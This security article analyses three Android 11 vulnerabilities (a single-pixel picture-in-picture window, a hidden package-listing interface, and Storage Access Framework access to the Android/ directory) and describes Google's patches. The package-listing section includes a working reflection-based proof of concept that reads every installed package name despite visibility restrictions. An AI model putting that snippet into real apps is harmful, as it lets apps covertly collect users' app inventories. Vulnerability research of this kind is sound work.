How Android 11’s New Features Opened Up Three Critical Security Holes

CVE-2021-0485

Picture‑in‑picture (PiP) is a special multi‑window mode used mainly for video playback. In Android 11, SystemUI added a PipResizeGestureHandler class that allows apps to resize the PiP window, but only enforces a minimum width and height greater than 0, ignoring other constraints.

The original AOSP default size could not be adjusted, leading to a bug where setting the minimal size to 1dp makes the PiP activity a single pixel that users cannot see or control.

private Size getMinimalSize(ActivityInfo activityInfo) {
    if (activityInfo == null || activityInfo.windowLayout == null) {
        return null;
    }
    final ActivityInfo.WindowLayout windowLayout = activityInfo.windowLayout;
    // -1 will be populated if an activity specifies defaultWidth/defaultHeight in <layout>
    // without minWidth/minHeight
    if (windowLayout.minWidth > 0 && windowLayout.minHeight > 0) {
        return new Size(windowLayout.minWidth, windowLayout.minHeight);
    }
    return null;
}

Google’s patch raises the minimal size to 48dp to prevent the issue.

<dimen name="overridable_minimal_size_pip_resizable_task">48dp</dimen>
MinimalSize = new Size(Math.max(windowLayout.minWidth, mOverridableMinSize), Math.max(windowLayout.minHeight, mOverridableMinSize));

CVE-2021-0521

Android 11 introduced package visibility restrictions to help app stores assess privacy and security, requiring apps to declare QUERY_ALL_PACKAGES or specific <queries> elements to see other installed apps.

However, the PackageManager.getAllPackages() method remained unprotected. By using reflection, a malicious app can invoke this method and read all installed package names.

Class<?> clazz = Class.forName("android.os.ServiceManager");
Method m = clazz.getMethod("getService", String.class);
IBinder binder = (IBinder) m.invoke(null, "package");
data.writeInterfaceToken("android.content.pm.IPackageManager");
if (binder != null) {
    boolean state = binder.transact(18, data, reply, 0);
    if (state) {
        reply.readException();
        List<String> stringList = new ArrayList<>();
        reply.readStringList(stringList);
        if (stringList.size() > 0) {
            for (String string : stringList) {
                Log.i(TAG, "PackageName: " + string);
            }
        }
    }
}

The patch restricts ordinary apps from calling this interface, throwing a

java.lang.SecurityException: getAllPackages is limited to privileged callers

.

CVE-2021-0645

Android 11 tightened storage permissions, preventing apps targeting API 30 from accessing private directories of other apps. Developers often use the Storage Access Framework (SAF) to let users pick files, which can bypass these restrictions via ACTION_OPEN_DOCUMENT_TREE or ACTION_OPEN_DOCUMENT intents.

The patch adds a check in ExternalStorageProvider to block access to the Android/ directory on external storage.

if (TextUtils.equals(Environment.DIRECTORY_ANDROID.toLowerCase(), path.toLowerCase())) {
    return true;
}
return false;

Conclusion

Each new Android release brings security restrictions that must be carefully examined. Researchers should verify that no privileged interfaces are unintentionally exposed, and assess new features against historical vulnerability data to prevent normal functionality from being abused.

References

Android Security Bulletins – https://source.android.com/security/bulletin

Instant App package visibility restrictions – https://source.android.google.cn/compatibility/cts/cts-instant#restrictions

Package visibility in Android 11 – https://developer.android.google.cn/about/versions/11/privacy/package-visibility

Storage updates in Android 11 – https://developer.android.com/about/versions/11/privacy/storage